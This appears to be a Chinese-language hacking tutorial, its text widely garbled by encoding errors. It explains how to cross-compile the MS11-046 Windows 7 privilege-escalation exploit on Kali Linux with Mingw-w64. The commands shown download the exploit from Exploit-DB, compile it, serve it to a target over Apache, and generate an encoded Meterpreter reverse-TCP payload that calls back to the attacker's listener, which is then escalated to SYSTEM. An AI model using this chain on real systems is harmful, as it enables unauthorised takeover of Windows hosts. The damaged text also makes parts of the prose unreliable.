如何在Kali Linux上編譯Windows漏洞����!
Mingw-w64是一個(gè)用于創(chuàng)建Windows應(yīng)用程序的自由和開源軟件開發(fā)環(huán)境。 Mingw-w64最初叫Mingw32��,它當(dāng)時(shí)不支持64位架構(gòu)��。在本教程中,我們將討論如何使用Mingw-64在 Kali Linux上編譯Windows漏洞���。 讓我們開始在Kali Linux上安裝Mingw-w64。
Mingw-w64是一個(gè)用于創(chuàng)建Windows應(yīng)用程序的自由和開源軟件開發(fā)環(huán)境�����。 Mingw-w64最初叫Mingw32,它當(dāng)時(shí)不支持64位架構(gòu)�。
在本教程中���,我們將討論如何使用Mingw-64在 Kali Linux上編譯Windows漏洞��。 讓我們開始在Kali Linux上安裝Mingw-w64��。
1�、在Kali Linux上安裝Mingw-w64
默認(rèn)情況下,Kali Linux 2016.2和更低版本上未安裝Mingw-w64�。 因此�����,我們需要先安裝它�,然后才能在Linux上編譯Windows漏洞。 執(zhí)行以下命令���,安裝Mingw-w64:
apt-get update apt-get install mingw-w64
使用apt-get install mingw-w64在您的Kali主機(jī)上安裝mingw-w64�����。
鍵入y為yes��,以確認(rèn)并繼續(xù)Mingw-w64安裝過程���。 下載和安裝Mingw-w64可能需要一段時(shí)間才能完成。
2、無法找到程序包mingw-w64的解決方法
有時(shí)��,你嘗試安裝mingw-w64包時(shí)得到一個(gè)無法找到包mingw-w64的錯(cuò)誤���,并得到類似如下提示:
root@kali:~# apt-getinstall mingw-w64 Reading package lists…Done Building dependency tree Reading stateinformation… Done E: Unable to locatepackage mingw-w64
要解決這個(gè)問題,請(qǐng)確保在sources.list文件中具有正確的存儲(chǔ)庫。您可以使用nano編輯文件:
/etc/apt/sources.list
確保您在此文件中具有正確的存儲(chǔ)庫��。 您可以在以下頁面上找到不同版本的Kali Linux的存儲(chǔ)庫:
http://docs.kali.org/general-use/kali-linux-sources-list-repositories
使用sources.list文件中的正確的存儲(chǔ)庫����,您需要運(yùn)行apt-get update,然后再次運(yùn)行Mingw-w64軟件包的安裝命令�����。
3�����、用Mingw-w64交叉編譯Windows漏洞利用
現(xiàn)在我們已經(jīng)安裝了Mingw-w64���,可以開始編譯Windows漏洞利用程序了�����。 對(duì)于本教程���,我們將編譯一個(gè)用C編寫的Windows漏洞利用程序�����,以利用Windows 7 SP0 x86中的CVE-2011-1249(MS11-046)漏洞����。 此版本的Windows操作系統(tǒng)在輔助功能驅(qū)動(dòng)程序(AFD)中包含一個(gè)漏洞��,允許已認(rèn)證的非管理用戶提升權(quán)限。即使Mingw-w64是為非常需要的64位支持開發(fā)的���,我們也可以編譯32位Windows漏洞��。 讓我們來看看如何編譯32位Windows漏洞����。
讓我們從Exploit-db下載漏洞:
wget --output-document= 40564.c https://www.exploit-db.com/download/40564
使用以下命令編譯Windows 32位的afd.sys exploit:
i686-w64-mingw32-gcc[input file: source]–o [output file: .exe]-lws2_32
以下命令將編譯Windows 7 afd.sys特權(quán)升級(jí)漏洞:
i686-w64-mingw32-gcc 40564.c –o exploit.exe –lws2_32
編譯Windows漏洞����。
要將漏洞利用程序轉(zhuǎn)移到目標(biāo)主機(jī)�����,我們將使用內(nèi)置的ApacheWeb服務(wù)器來提供它�。 最后2個(gè)命令會(huì)將exploit復(fù)制到Apache主目錄并啟動(dòng)Apache Web服務(wù)器�。
當(dāng)我們從cmd.exe下載并執(zhí)行該漏洞時(shí),它將如下所示:
漏洞利用成功執(zhí)行����。
因?yàn)槲覀兛梢钥吹絯hoami命令在執(zhí)行exploit之前返回一個(gè)普通用戶權(quán)限,之后顯示是system用戶權(quán)限�����。這個(gè)exploit實(shí)際上在當(dāng)前shell中生成一個(gè)新的shell,而不是在新窗口中創(chuàng)建一個(gè)新的shell����。這意味著我們也可以從命令行shell運(yùn)行此漏洞利用程序�,例如Meterpreter��。讓我們看看如何從Meterpreter會(huì)話運(yùn)行漏洞利用���。
4����、利用編譯錯(cuò)誤
當(dāng)編譯針對(duì)不同架構(gòu)和操作系統(tǒng)的漏洞時(shí),可能會(huì)發(fā)生許多錯(cuò)誤��。有很多因素可能導(dǎo)致編譯失敗�,例如:語法�����,庫���,主機(jī)和目標(biāo)體系結(jié)構(gòu),用于編譯代碼的已安裝軟件等等��。一些錯(cuò)誤可能很容易修復(fù)���,有些錯(cuò)誤則不是�。同樣重要的是不同的警告來自致命的錯(cuò)誤,因?yàn)榫婵赡苤皇侵甘疽恍╊愃频倪^時(shí)的功能�����,不能阻止漏洞的工作����。致命錯(cuò)誤會(huì)阻止漏洞利用,因此需要修復(fù)�����。
處理編譯錯(cuò)誤的最佳方法是仔細(xì)閱讀�����,然后在Google上搜索解決方案��。通常你不是第一個(gè)也不是唯一面對(duì)某個(gè)編譯錯(cuò)誤的人�����,因此沒有必要重新發(fā)明輪子。在線資源(如堆棧交換)通常為您提供最常見的編譯錯(cuò)誤的可能解決方案����。
5、從Meterpreter shell中利用MS11-046
讓我們使用Msfvenom快速生成Windows 32位Meterpreter反向TCP有效負(fù)載�,并在目標(biāo)主機(jī)上執(zhí)行它���。 我們將在Metasploit中使用多處理程序來捕獲反向shell�。
使用以下命令使用Msfvenom創(chuàng)建有效負(fù)載:
msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcpLHOST=[IP attackbox] LPORT=4444 -e x86/shikata_ga_nai –f exe –o exploit.exe
請(qǐng)務(wù)必更換偵聽主機(jī)IP���,必要時(shí)更換偵聽端口。現(xiàn)在啟動(dòng)msfconsole并運(yùn)行以下命令來設(shè)置多處理器漏洞:
use exploit/multi/handler set lhost [listening host IP] set lport 4444 run
在端口4444上啟動(dòng)反向TCP處理程序�����。
然后下載利用程序到目標(biāo)主機(jī)并執(zhí)行它。 如果一切設(shè)置正確���,您應(yīng)該在msfconsole上收到一個(gè)反向Meterpreter shell:
目標(biāo)主機(jī)連接回Kali����。
在Meterpreter命令行上運(yùn)行下一“shell”命令并運(yùn)行特權(quán)升級(jí)漏洞利用程序?qū)hell升級(jí)到系統(tǒng)shell:
特權(quán)升級(jí)攻擊通過我們的Meterpreter會(huì)話成功執(zhí)行����。
正如你可以看到的����,shell從特權(quán)測(cè)試用戶shell變化到系統(tǒng)shell��。 請(qǐng)注意���,在執(zhí)行它的shell中生成一個(gè)新的系統(tǒng)shell�。 因此,我們不能看到利用輸出����,因?yàn)樗窃谟邢薜奶貦?quán)的舊shell。
您可以通過鍵入Exit來驗(yàn)證這一點(diǎn)���,將退出系統(tǒng)shell并返回到仍包含Windows 7權(quán)限升級(jí)exploit輸出的用戶shell:
特權(quán)用戶shell上的exploit輸出。
學(xué)到的東西
在本教程中,我們已經(jīng)了解了在Linux上針對(duì)Windows的交叉編譯漏洞的基礎(chǔ)知識(shí)����。 我們已經(jīng)學(xué)習(xí)了如何在Kali Linux上安裝Mingw-w64并解決最常見的安裝問題����。 為了練習(xí)漏洞編譯過程�����,我們編譯了一個(gè)針對(duì)Windows7 x86的特權(quán)提升漏洞��。 這也稱為交叉編譯����。
我們已成功的在目標(biāo)主機(jī)上執(zhí)行已編譯的可執(zhí)行文件,并將shell從有限的用戶shell升級(jí)到系統(tǒng)shell。 我們已經(jīng)知道��,這個(gè)特殊的exploit在shell中生成了一個(gè)shell�,在這個(gè)shell中執(zhí)行了exploit����。 這樣���,我們還可以從命令行(例如Meterpreter shell)執(zhí)行特權(quán)提升漏洞利用。
最后但同樣重要的是�����,我們已經(jīng)了解了如何在編譯過程中修復(fù)錯(cuò)誤�����。
